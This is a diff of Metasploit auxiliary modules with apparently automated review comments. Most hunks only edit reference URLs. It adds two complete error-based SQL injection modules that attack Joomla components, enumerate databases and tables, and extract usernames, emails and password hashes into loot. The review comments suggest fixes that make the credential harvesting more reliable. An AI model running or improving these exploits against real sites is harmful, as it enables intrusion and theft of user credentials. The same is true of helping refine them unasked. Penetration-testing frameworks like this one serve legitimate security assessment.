[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ],
|
||||
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt' ],
|
||||
],
|
||||
'DisclosureDate' => 'Jun 3 2015'))
|
||||
|
||||
|
|
|
@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CVE', '2015-2996'],
|
||||
['CVE', '2015-2997'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8'],
|
||||
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt'],
|
||||
],
|
||||
'DisclosureDate' => 'Jun 3 2015'))
|
||||
|
||||
|
|
|
@ -29,8 +29,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CVE', '2015-2996'],
|
||||
['CVE', '2015-2998'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8'],
|
||||
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt']
|
||||
],
|
||||
'DisclosureDate' => 'Jun 3 2015'))
|
||||
|
||||
|
|
|
@ -21,11 +21,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
as well as read privileges to the target file.
|
||||
},
|
||||
'Author' => [ 'todb' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://michaeldaw.org/sql-injection-cheat-sheet#postgres' ]
|
||||
]
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options(
|
||||
|
|
|
@ -99,7 +99,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("#{peer} - Executing the command...")
|
||||
begin
|
||||
return psexec(execute)
|
||||
rescue Rex::Proto::SMB::Exceptions::Error => exec_command_error
|
||||
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => exec_command_error
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
|
||||
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
return false
|
||||
end
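Review bot: The new `elog` line references `e`, but the rescued exception is bound to `exec_command_error`, so unless a method named `e` happens to be in scope the first DCERPC/SMB failure raises NameError from inside the rescue clause and the `print_error`/`return false` path below it is never reached. Change the line to `elog("#{exec_command_error.class} #{exec_command_error.message}\n#{exec_command_error.backtrace * "\n"}", 'rex', LEV_3)` or bind the exception as `=> e` in the rescue clause. The `'rex'` log source is unusual for a module; the core code in this same commit logs with `'core'`, so confirm which source the log filters expect. The enclosing method starts before the hunk.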
|
||||
|
|
|
@ -34,8 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['CVE', '2003-0027'],
|
||||
['OSVDB', '8201'],
|
||||
['BID', '6665'],
|
||||
['URL', 'http://marc.info/?l=bugtraq&m=104326556329850&w=2'],
|
||||
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1']
|
||||
['URL', 'http://marc.info/?l=bugtraq&m=104326556329850&w=2']
|
||||
],
|
||||
# Tested OK against sol8.tor 20100624 -jjd
|
||||
'DisclosureDate' => 'Jan 22 2003')
|
||||
|
|
|
@ -21,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://github.com/claudijd/BNAT-Suite'],
|
||||
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels'],
|
||||
[ 'URL', 'https://github.com/claudijd/bnat' ],
|
||||
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels']
|
||||
]
|
||||
)
|
||||
register_options(
|
||||
|
|
|
@ -25,8 +25,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://github.com/claudijd/BNAT-Suite'],
|
||||
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels'],
|
||||
[ 'URL', 'https://github.com/claudijd/bnat'],
|
||||
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels']
|
||||
]
|
||||
)
|
||||
|
||||
|
|
|
@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'BID', '1154'],
|
||||
[ 'CVE', '2000-0380'],
|
||||
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20000514-ios-http-server.shtml'],
|
||||
[ 'OSVDB', '1302' ],
|
||||
],
|
||||
'DisclosureDate' => 'Apr 26 2000'))
|
||||
|
|
|
@ -30,8 +30,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'References' => [
|
||||
['CVE', '2015-5477'],
|
||||
['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],
|
||||
['URL', 'https://kb.isc.org/article/AA-01272'],
|
||||
['URL', 'https://github.com/rapid7/metasploit-framework/issues/5790']
|
||||
['URL', 'https://kb.isc.org/article/AA-01272']
|
||||
],
|
||||
'DisclosureDate' => 'Jul 28 2015',
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.html' ],
|
||||
[ 'BID', '16838' ],
|
||||
[ 'OSVDB', '23511' ],
|
||||
[ 'CVE', '2006-0900' ],
|
||||
|
|
|
@ -30,7 +30,6 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
['CVE', '2014-0050'],
|
||||
['URL', 'http://markmail.org/message/kpfl7ax4el2owb3o'],
|
||||
['URL', 'http://tomcat.apache.org/security-8.html'],
|
||||
['URL', 'http://tomcat.apache.org/security-7.html']
|
||||
],
|
||||
|
|
|
@ -26,8 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CVE', '2013-3843'],
|
||||
['OSVDB', '93853'],
|
||||
['BID', '60333'],
|
||||
['URL', 'http://bugs.monkey-project.com/ticket/182']
|
||||
['BID', '60333']
|
||||
],
|
||||
'DisclosureDate' => 'May 30 2013'))
|
||||
|
||||
|
|
|
@ -29,8 +29,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2005-4797' ],
|
||||
[ 'BID', '14510' ],
|
||||
[ 'OSVDB', '18650' ],
|
||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
||||
[ 'OSVDB', '18650' ]
|
||||
]
|
||||
))
|
||||
|
||||
|
|
|
@ -29,7 +29,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-2686'],
|
||||
[ 'URL', 'https://www.openssl.org/news/secadv_20130205.txt']
|
||||
[ 'URL', 'https://www.openssl.org/news/secadv/20130205.txt' ]
|
||||
],
|
||||
'DisclosureDate' => 'Feb 05 2013'))
|
||||
|
||||
|
|
|
@ -19,10 +19,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => ["Sil3nt_Dre4m"],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://kaillerahacks.blogspot.com/2011/07/kaillera-server-086-dos-vulnerability.html' ]
|
||||
],
|
||||
'DisclosureDate' => 'Jul 2 2011'))
|
||||
|
||||
register_options([
|
||||
|
|
|
@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '50617' ],
|
||||
[ 'BID', '5817' ],
|
||||
[ 'URL', 'http://sh0dan.org/oldfiles/hackingcitrix.html' ],
|
||||
[ 'BID', '5817' ]
|
||||
]
|
||||
))
|
||||
|
||||
|
|
|
@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'],
|
||||
['URL', 'http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf']
|
||||
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html']
|
||||
]))
|
||||
|
||||
register_options([
|
||||
|
|
|
@ -34,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2014-6039' ],
|
||||
[ 'OSVDB', '114342' ],
|
||||
[ 'OSVDB', '114344' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/12' ]
|
||||
],
|
||||
'DisclosureDate' => 'Nov 5 2014'))
|
||||
|
|
|
@ -70,8 +70,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CWE', '425'],
|
||||
['CVE', '2013-6031'],
|
||||
['US-CERT-VU', '341526'],
|
||||
['URL', 'http://www.huaweidevice.co.in/Support/Downloads/'],
|
||||
['US-CERT-VU', '341526']
|
||||
],
|
||||
'DisclosureDate' => "Nov 11 2013" ))
|
||||
|
||||
|
|
|
@ -32,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2015-0072' ],
|
||||
[ 'OSVDB', '117876' ],
|
||||
[ 'MSB', 'MS15-018' ],
|
||||
[ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
|
||||
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
|
||||
],
|
||||
|
|
|
@ -0,0 +1,260 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Joomla Real Estate Manager Component Error-Based SQL Injection',
|
||||
'Description' => %q{
|
||||
This module exploits a SQL injection vulnerability in Joomla Plugin
|
||||
com_realestatemanager versions 3.7 in order to either enumerate
|
||||
usernames and password hashes.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '38445']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Omer Ramic', # discovery
|
||||
'Nixawk', # metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => 'Oct 22 2015'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def print_good(message='')
|
||||
super("#{rhost}:#{rport} - #{message}")
|
||||
end
|
||||
|
||||
def print_status(message='')
|
||||
super("#{rhost}:#{rport} - #{message}")
|
||||
end
|
||||
|
||||
def report_cred(opts)
|
||||
service_data = {
|
||||
address: opts[:ip],
|
||||
port: opts[:port],
|
||||
service_name: ssl ? 'https' : 'http',
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
credential_data = {
|
||||
origin_type: :service,
|
||||
module_fullname: fullname,
|
||||
username: opts[:user]
|
||||
}.merge(service_data)
|
||||
|
||||
if opts[:password]
|
||||
credential_data.merge!(
|
||||
private_data: opts[:password],
|
||||
private_type: :nonreplayable_hash,
|
||||
jtr_format: 'md5'
|
||||
)
|
||||
end
|
||||
|
||||
login_data = {
|
||||
core: create_credential(credential_data),
|
||||
status: opts[:status],
|
||||
proof: opts[:proof]
|
||||
}.merge(service_data)
|
||||
|
||||
create_credential_login(login_data)
|
||||
end
|
||||
|
||||
def check
|
||||
flag = Rex::Text.rand_text_alpha(5)
|
||||
payload = "0x#{flag.unpack('H*')[0]}"
|
||||
|
||||
data = sqli(payload)
|
||||
if data && data.include?(flag)
|
||||
Msf::Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Msf::Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def sqli(query)
|
||||
lmark = Rex::Text.rand_text_alpha(5)
|
||||
rmark = Rex::Text.rand_text_alpha(5)
|
||||
|
||||
payload = '(SELECT 6062 FROM(SELECT COUNT(*),CONCAT('
|
||||
payload << "0x#{lmark.unpack('H*')[0]},"
|
||||
payload << '%s,'
|
||||
payload << "0x#{rmark.unpack('H*')[0]},"
|
||||
payload << 'FLOOR(RAND(0)*2)'
|
||||
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
|
||||
|
||||
get = {
|
||||
'option' => 'com_realestatemanager',
|
||||
'task' => 'showCategory',
|
||||
'catid' => '50',
|
||||
'Itemid' => '132'
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
'vars_get' => get,
|
||||
})
|
||||
|
||||
|
||||
if res && res.code == 200
|
||||
cookie = res.get_cookies
|
||||
post = {
|
||||
'order_field' => 'price',
|
||||
'order_direction' => 'asc,' + (payload % query)
|
||||
}
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
'method' => 'POST',
|
||||
'cookie' => cookie,
|
||||
'vars_get' => get,
|
||||
'vars_post' => post
|
||||
})
|
||||
|
||||
# Error based SQL Injection
|
||||
if res && res.code == 500 && res.body =~ /#{lmark}(.*)#{rmark}/
|
||||
$1
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def query_databases
|
||||
dbs = []
|
||||
|
||||
query = '(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) '
|
||||
query << 'FROM INFORMATION_SCHEMA.SCHEMATA)'
|
||||
|
||||
dbc = sqli(query)
|
||||
|
||||
query_fmt = '(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) '
|
||||
query_fmt << 'FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1)'
|
||||
|
||||
0.upto(dbc.to_i - 1) do |i|
|
||||
dbname = sqli(query_fmt % i)
|
||||
dbs << dbname
|
||||
vprint_good("Found database name: #{dbname}")
|
||||
end
|
||||
|
||||
%w(performance_schema information_schema mysql).each do |dbname|
|
||||
dbs.delete(dbname) if dbs.include?(dbname)
|
||||
end
|
||||
dbs
|
||||
end
|
||||
|
||||
def query_tables(database)
|
||||
tbs = []
|
||||
|
||||
query = '(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) '
|
||||
query << 'FROM INFORMATION_SCHEMA.TABLES '
|
||||
query << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}))"
|
||||
|
||||
tbc = sqli(query)
|
||||
|
||||
query_fmt = '(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) '
|
||||
query_fmt << 'FROM INFORMATION_SCHEMA.TABLES '
|
||||
query_fmt << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}) "
|
||||
query_fmt << 'LIMIT %d,1)'
|
||||
|
||||
vprint_status('tables in database: %s' % database)
|
||||
0.upto(tbc.to_i - 1) do |i|
|
||||
tbname = sqli(query_fmt % i)
|
||||
vprint_good("Found table #{database}.#{tbname}")
|
||||
tbs << tbname if tbname =~ /_users$/
|
||||
end
|
||||
tbs
|
||||
end
|
||||
|
||||
def query_columns(database, table)
|
||||
cols = []
|
||||
query = "(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{database}.#{table})"
|
||||
|
||||
colc = sqli(query)
|
||||
vprint_status("Found Columns: #{colc} from #{database}.#{table}")
|
||||
|
||||
valid_cols = [ # joomla_users
|
||||
'activation',
|
||||
'block',
|
||||
'email',
|
||||
'id',
|
||||
'lastResetTime',
|
||||
'lastvisitDate',
|
||||
'name',
|
||||
'otep',
|
||||
'otpKey',
|
||||
'params',
|
||||
'password',
|
||||
'registerDate',
|
||||
'requireReset',
|
||||
'resetCount',
|
||||
'sendEmail',
|
||||
'username'
|
||||
]
|
||||
|
||||
query_fmt = '(SELECT MID((IFNULL(CAST(%s AS CHAR),0x20)),%d,54) '
|
||||
query_fmt << "FROM #{database}.#{table} ORDER BY id LIMIT %d,1)"
|
||||
|
||||
0.upto(colc.to_i - 1) do |i|
|
||||
record = {}
|
||||
valid_cols.each do |col|
|
||||
l = 1
|
||||
record[col] = ''
|
||||
loop do
|
||||
value = sqli(query_fmt % [col, l, i])
|
||||
break if value.blank?
|
||||
record[col] << value
|
||||
l += 54
|
||||
end
|
||||
end
|
||||
cols << record
|
||||
|
||||
unless record['username'].blank?
|
||||
print_good("Found credential: #{record['username']}:#{record['password']} (Email: #{record['email']})")
|
||||
report_cred(
|
||||
ip: rhost,
|
||||
port: datastore['RPORT'],
|
||||
user: record['username'].to_s,
|
||||
password: record['password'].to_s,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED,
|
||||
proof: record.to_s
|
||||
)
|
||||
end
|
||||
|
||||
vprint_status(record.to_s)
|
||||
end
|
||||
cols
|
||||
end
|
||||
|
||||
def run
|
||||
dbs = query_databases
|
||||
dbs.each do |db|
|
||||
tables = query_tables(db)
|
||||
tables.each do |table|
|
||||
cols = query_columns(db, table)
|
||||
next if cols.blank?
|
||||
path = store_loot(
|
||||
'joomla.users',
|
||||
'text/plain',
|
||||
datastore['RHOST'],
|
||||
cols.to_json,
|
||||
'joomla.users')
|
||||
print_good('Saved file to: ' + path)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
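Review bot: In query_databases the per-database loop pushes whatever `sqli` returned, but `sqli` yields nil whenever the 500 page does not carry both markers, and that nil then reaches query_tables where `database.unpack('H*')` raises; add `next if dbname.blank?` before `dbs << dbname` (the `.to_i` on a nil count already degrades to zero iterations, but silently, so a `vprint_error` on a nil count would also help operators see a failed query rather than an empty result). report_cred hardcodes `jtr_format: 'md5'`; Joomla 3.x sites store bcrypt (`$2y$…`) hashes, so deriving the format from the hash prefix before reporting would avoid mislabeling loot. The identifiers interpolated into `FROM #{database}.#{table}` in query_columns come straight from the target and are unquoted, so backtick-quoting them (`FROM \`#{database}\`.\`#{table}\``) keeps extraction working on schema names with unusual characters. Minor: `colc` in query_columns is a row count (`COUNT(*)` from the table), so the "Found Columns" status message is misleading; `Found #{colc} rows in …` would read correctly.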
|
|
@ -0,0 +1,210 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Joomla com_contenthistory Error-Based SQL Injection',
|
||||
'Description' => %q{
|
||||
This module exploits a SQL injection vulnerability in Joomla versions 3.2
|
||||
through 3.4.4 in order to either enumerate usernames and password hashes.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2015-7297'],
|
||||
['URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Asaf Orpani', # discovery
|
||||
'bperry', # metasploit module
|
||||
'Nixawk' # module review
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => 'Oct 22 2015'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
flag = Rex::Text.rand_text_alpha(8)
|
||||
lmark = Rex::Text.rand_text_alpha(5)
|
||||
rmark = Rex::Text.rand_text_alpha(5)
|
||||
|
||||
payload = 'AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT('
|
||||
payload << "0x#{lmark.unpack('H*')[0]},"
|
||||
payload << "(SELECT 0x#{flag.unpack('H*')[0]}),"
|
||||
payload << "0x#{rmark.unpack('H*')[0]},"
|
||||
payload << 'FLOOR(RAND(0)*2)'
|
||||
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
|
||||
|
||||
res = sqli(payload)
|
||||
|
||||
if res && res.code == 500 && res.body =~ /#{lmark}#{flag}#{rmark}/
|
||||
Msf::Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Msf::Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def request(query, payload, lmark, rmark)
|
||||
query = "#{payload}" % query
|
||||
res = sqli(query)
|
||||
|
||||
# Error based SQL Injection
|
||||
if res && res.code == 500 && res.body =~ /#{lmark}(.*)#{rmark}/
|
||||
$1
|
||||
end
|
||||
end
|
||||
|
||||
def query_databases(payload, lmark, rmark)
|
||||
dbs = []
|
||||
|
||||
query = '(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) '
|
||||
query << 'FROM INFORMATION_SCHEMA.SCHEMATA)'
|
||||
|
||||
dbc = request(query, payload, lmark, rmark)
|
||||
|
||||
query_fmt = '(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) '
|
||||
query_fmt << 'FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1)'
|
||||
|
||||
0.upto(dbc.to_i - 1) do |i|
|
||||
dbname = request(query_fmt % i, payload, lmark, rmark)
|
||||
dbs << dbname
|
||||
vprint_good(dbname)
|
||||
end
|
||||
|
||||
%w(performance_schema information_schema mysql).each do |dbname|
|
||||
dbs.delete(dbname) if dbs.include?(dbname)
|
||||
end
|
||||
|
||||
dbs
|
||||
end
|
||||
|
||||
def query_tables(database, payload, lmark, rmark)
|
||||
tbs = []
|
||||
|
||||
query = '(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) '
|
||||
query << 'FROM INFORMATION_SCHEMA.TABLES '
|
||||
query << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}))"
|
||||
|
||||
tbc = request(query, payload, lmark, rmark)
|
||||
|
||||
query_fmt = '(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) '
|
||||
query_fmt << 'FROM INFORMATION_SCHEMA.TABLES '
|
||||
query_fmt << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}) "
|
||||
query_fmt << 'LIMIT %d,1)'
|
||||
|
||||
vprint_status('tables in database: %s' % database)
|
||||
0.upto(tbc.to_i - 1) do |i|
|
||||
tbname = request(query_fmt % i, payload, lmark, rmark)
|
||||
vprint_good(tbname)
|
||||
tbs << tbname if tbname =~ /_users$/
|
||||
end
|
||||
|
||||
tbs
|
||||
end
|
||||
|
||||
def query_columns(database, table, payload, lmark, rmark)
|
||||
cols = []
|
||||
query = "(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{database}.#{table})"
|
||||
|
||||
colc = request(query, payload, lmark, rmark)
|
||||
vprint_status(colc)
|
||||
|
||||
valid_cols = [ # joomla_users
|
||||
'activation',
|
||||
'block',
|
||||
'email',
|
||||
'id',
|
||||
'lastResetTime',
|
||||
'lastvisitDate',
|
||||
'name',
|
||||
'otep',
|
||||
'otpKey',
|
||||
'params',
|
||||
'password',
|
||||
'registerDate',
|
||||
'requireReset',
|
||||
'resetCount',
|
||||
'sendEmail',
|
||||
'username'
|
||||
]
|
||||
|
||||
query_fmt = '(SELECT MID((IFNULL(CAST(%s AS CHAR),0x20)),%d,54) '
|
||||
query_fmt << "FROM #{database}.#{table} ORDER BY id LIMIT %d,1)"
|
||||
|
||||
0.upto(colc.to_i - 1) do |i|
|
||||
record = {}
|
||||
valid_cols.each do |col|
|
||||
l = 1
|
||||
record[col] = ''
|
||||
loop do
|
||||
value = request(query_fmt % [col, l, i], payload, lmark, rmark)
|
||||
break if value.blank?
|
||||
record[col] << value
|
||||
l += 54
|
||||
end
|
||||
end
|
||||
cols << record
|
||||
vprint_status(record.to_s)
|
||||
end
|
||||
|
||||
cols
|
||||
end
|
||||
|
||||
def run
|
||||
lmark = Rex::Text.rand_text_alpha(5)
|
||||
rmark = Rex::Text.rand_text_alpha(5)
|
||||
|
||||
payload = 'AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT('
|
||||
payload << "0x#{lmark.unpack('H*')[0]},"
|
||||
payload << '%s,'
|
||||
payload << "0x#{rmark.unpack('H*')[0]},"
|
||||
payload << 'FLOOR(RAND(0)*2)'
|
||||
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
|
||||
|
||||
dbs = query_databases(payload, lmark, rmark)
|
||||
dbs.each do |db|
|
||||
tables = query_tables(db, payload, lmark, rmark)
|
||||
tables.each do |table|
|
||||
cols = query_columns(db, table, payload, lmark, rmark)
|
||||
next if cols.blank?
|
||||
path = store_loot(
|
||||
'joomla.users',
|
||||
'text/plain',
|
||||
datastore['RHOST'],
|
||||
cols.to_json,
|
||||
'joomla.users')
|
||||
print_good('Saved file to: ' + path)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def sqli(payload)
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
'vars_get' => {
|
||||
'option' => 'com_contenthistory',
|
||||
'view' => 'history',
|
||||
'list[ordering]' => '',
|
||||
'item_id' => 1,
|
||||
'type_id' => 1,
|
||||
'list[select]' => '1 ' + payload
|
||||
}
|
||||
)
|
||||
end
|
||||
|
||||
end
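Review bot: query_columns extracts usernames and password hashes but never reports them — `Msf::Auxiliary::Report` is included and the sibling com_realestatemanager module in this same commit calls `report_cred` per record, whereas here the records only reach `store_loot` in run, so the credential database never learns about them; a `report_cred` helper mirroring the sibling module (service_data from rhost/rport, `private_type: :nonreplayable_hash`, status `UNTRIED`) should be called inside the per-record loop. As in the other module, `request` returns nil when the marker regex does not match, and query_databases pushes that nil and later calls `database.unpack` on it in query_tables; guard with `next if dbname.blank?`. The marker/payload construction is duplicated between check and run; a small helper returning `[payload, lmark, rmark]` would keep the two in sync.

```ruby
# … unchanged: column extraction loop for each record …
cols << record

unless record['username'].blank?
  print_good("Found credential: #{record['username']}:#{record['password']} (Email: #{record['email']})")
  report_cred(
    ip: rhost,
    port: datastore['RPORT'],
    user: record['username'].to_s,
    password: record['password'].to_s,
    status: Metasploit::Model::Login::Status::UNTRIED,
    proof: record.to_s
  )
end

vprint_status(record.to_s)
```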
|
|
@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2014-4872' ],
|
||||
[ 'OSVDB', '112741' ],
|
||||
[ 'US-CERT-VU', '121036' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/bmc-track-it-11.3.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Oct/34' ]
|
||||
],
|
||||
'DisclosureDate' => 'Oct 7 2014'
|
||||
|
|
|
@ -35,8 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '1999-0103' ], # Note, does not actually trigger a flood.
|
||||
[ 'URL', 'https://www.cert.be/pro/docs/chargensnmp-ddos-attacks-rise' ],
|
||||
[ 'URL', 'http://tools.ietf.org/html/rfc864' ],
|
||||
[ 'URL', 'http://tools.ietf.org/html/rfc864' ]
|
||||
],
|
||||
'DisclosureDate' => 'Feb 08 1996')
|
||||
|
||||
|
|
|
@ -14,8 +14,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'DECT Call Scanner',
|
||||
'Description' => 'This module scans for active DECT calls',
|
||||
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [ ['URL', 'http://www.dedected.org'] ]
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
end
|
||||
|
||||
|
|
|
@ -14,8 +14,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'DECT Base Station Scanner',
|
||||
'Description' => 'This module scans for DECT base stations',
|
||||
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [ ['URL', 'http://www.dedected.org'] ]
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
end
|
||||
|
|
|
@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'BID', '2936'],
|
||||
[ 'CVE', '2001-0537'],
|
||||
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20010627-ios-http-level.shtml'],
|
||||
